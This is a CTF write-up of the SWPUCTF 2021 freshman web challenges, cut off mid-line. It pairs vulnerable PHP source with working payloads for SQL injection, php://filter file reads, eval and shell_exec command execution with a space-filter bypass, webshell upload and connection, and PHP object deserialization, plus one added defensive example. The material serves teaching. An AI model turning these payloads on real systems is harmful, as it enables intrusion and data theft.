SWPUCTF 2021 Freshman Competition
web
[SWPUCTF 2021 Freshman Competition]gift_F12
Right-click and view the page source; the flag is right there.
WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
[SWPUCTF 2021 Freshman Competition]jicao
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm"){
    echo $flag;
}
?>
Payload (note that the JSON must use double quotes):
GET: ?json={"x":"wllm"}
POST: id=wllmNB
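[SWPUCTF 2021 Freshman Competition]easy_md5
<?php
highlight_file(__FILE__);
include 'flag2.php';
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
}
else {
    echo 'wrong!';
}
?>
Weak typing in the md5 comparison: pass arrays. On PHP versions before 8, md5() cannot hash an array and returns NULL for both parameters, so the loose == holds while the two arrays themselves differ.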
GET: ?name[]=1
POST: password[]=2
[SWPUCTF 2021 Freshman Competition]caidao
Opening the link http://1.14.71.254:28164/ directly displays @eval($_POST['wllm']);
Connect AntSword to index.php; the flag is in the root directory.
[SWPUCTF 2021 Freshman Competition]easyrce
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url'])){
    eval($_GET['url']);
}
?>
There is no filtering at all, so pass the command directly:
?url=system("tac /flllllaaaaaaggggggg");
[SWPUCTF 2021 Freshman Competition]easy_sql
?wllm=-1' or 1=1--+ returns normally
?wllm=-1' or 1=2--+ returns an error
An injection exists, so exploit it directly.
Determine the number of columns:
?wllm=-1' order by 3--+ returns normally
?wllm=-1' order by 4--+ returns an error
So there are 3 columns.
Determine which columns are echoed back:
?wllm=-1' union select 1,2,3--+
Result:
Your Login name:2
Your Password:3
So columns 2 and 3 are both echoed back.
?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
This gives the table names:
Your Login name:test_tb,users
Your Password:3
Use the test_tb table:
?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="test_tb"--+
This gives the column names:
Your Login name:id,flag
Your Password:3
Finally, dump the field values:
?wllm=-1' union select 1,group_concat(flag),3 from test_tb--+
This gives the flag:
Your Login name:NSSCTF{ec4be791-7211-4518-9238-06362ac19443}
Your Password:3
[SWPUCTF 2021 Freshman Competition]include
<?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
    show_source(__FILE__);
    echo 'flag 在flag.php中'; // "the flag is in flag.php"
}else{
    echo "传入一个file试试"; // "try passing in a file"
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?>
Use the php://filter wrapper directly:
?file=php://filter/read=convert.base64-encode/resource=flag.php
Then base64-decode the output:
//PD9waHANCiRmbGFnPSdOU1NDVEZ7NGVhMWFjZmYtYzA0Mi00OTA2LTgxNzYtYWRmYzI2M2Y5YWM0fSc7
<?php
$flag='NSSCTF{4ea1acff-c042-4906-8176-adfc263f9ac4}';
[SWPUCTF 2021 Freshman Competition]babyrce
<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)
{
    include "../next.php";
}
else
    echo "小饼干最好吃啦!"; // "Cookies are the tastiest!"
?>
Add Cookie: admin=1 to the request headers.
The response reveals rasalghul.php; visit that page directly:
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
    $ip=$_GET['url'];
    if(preg_match("/ /", $ip)){
        die('nonono');
    }
    $a = shell_exec($ip);
    echo $a;
}
?>
shell_exec runs Linux commands directly, but spaces are filtered; use ${IFS} to bypass the filter:
?url=cat${IFS}/flllllaaaaaaggggggg
[SWPUCTF 2021 Freshman Competition]ez_unserialize
The page source contains:
<!--
User-agent: *
Disallow: What could this be?
-->
Visit robots.txt:
User-agent: *
Disallow: /cl45s.php
Open that PHP file to get the source to audit:
<?php
error_reporting(0);
show_source("cl45s.php");
class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
$p = $_GET['p'];
unserialize($p);
?>
Build the serialized string directly so that deserializing it triggers the __destruct magic method:
<?php
class wllm{
    public $admin = "admin";
    public $passwd = "ctf";
}
$a = new wllm();
echo serialize($a); //O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
?>
So the final payload is:
/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
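The defensive counterpart to the payload above, as an added example that is not part of the challenge or of the original write-up: it shows how the same serialized string is handled once object instantiation is refused, and how the input can be replaced by validated JSON. The static $privileged marker, the parse_profile helper and the "name" field are hypothetical names introduced for this illustration.

```php
<?php
// Added example, not the challenge's code. The class mirrors cl45s.php; the
// flag include is replaced by a static marker so this runs stand-alone.
class wllm {
    public $admin = "user";
    public $passwd = "123456";
    public static $privileged = false;      // hypothetical marker for this demo
    public function __destruct() {
        if ($this->admin === "admin" && $this->passwd === "ctf") {
            self::$privileged = true;        // stands in for "echo $flag"
        }
    }
}

// Constructed input: the serialized object shown in the write-up.
$p = 'O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}';

// Mitigation 1: if unserialize() must stay, forbid object instantiation.
// The data becomes a __PHP_Incomplete_Class, so wllm::__destruct never runs.
$obj = unserialize($p, ['allowed_classes' => false]);
printf("instance of wllm: %s\n", var_export($obj instanceof wllm, true));
unset($obj);
printf("privileged branch reached: %s\n", var_export(wllm::$privileged, true));

// Mitigation 2 (preferred): accept plain JSON, validate each field, and copy
// only what is expected. Authorization state stays on the server.
function parse_profile(string $raw): ?array    // hypothetical helper
{
    try {
        $data = json_decode($raw, true, 4, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;                          // not JSON, e.g. a serialized blob
    }
    if (!is_array($data) || !is_string($data['name'] ?? null)) {
        return null;
    }
    return ['name' => $data['name']];         // "admin"/"passwd" keys are ignored
}

var_dump(parse_profile($p));
var_dump(parse_profile('{"name":"alice","admin":"admin","passwd":"ctf"}'));
```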
[SWPUCTF 2021 Freshman Competition]Do_you_know_http
Opening the page shows the prompt: Please use 'WLLM' browser!
The User-Agent clearly needs to be changed:
User-Agent: WLLM
A 302 then redirects to a.php, which shows: You can only read this at local!
So set X-Forwarded-For:
X-Forwarded-For: 127.0.0.1
Another 302 then redirects to secretttt.php; open it to see the flag.
[SWPUCTF 2021 Freshman Competition]easyupload2.0
Upload a one-line webshell as a .phtml file.
Connect with AntSword and find the flag in flag.php.
[SWPUCTF 2021 Freshman Competition]no_wakeup
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
    public function __wakeup(){
        $this->passwd = sha1($this->passwd);
    }
    public function __destruct(){
        if($this->admin === "admin" &&a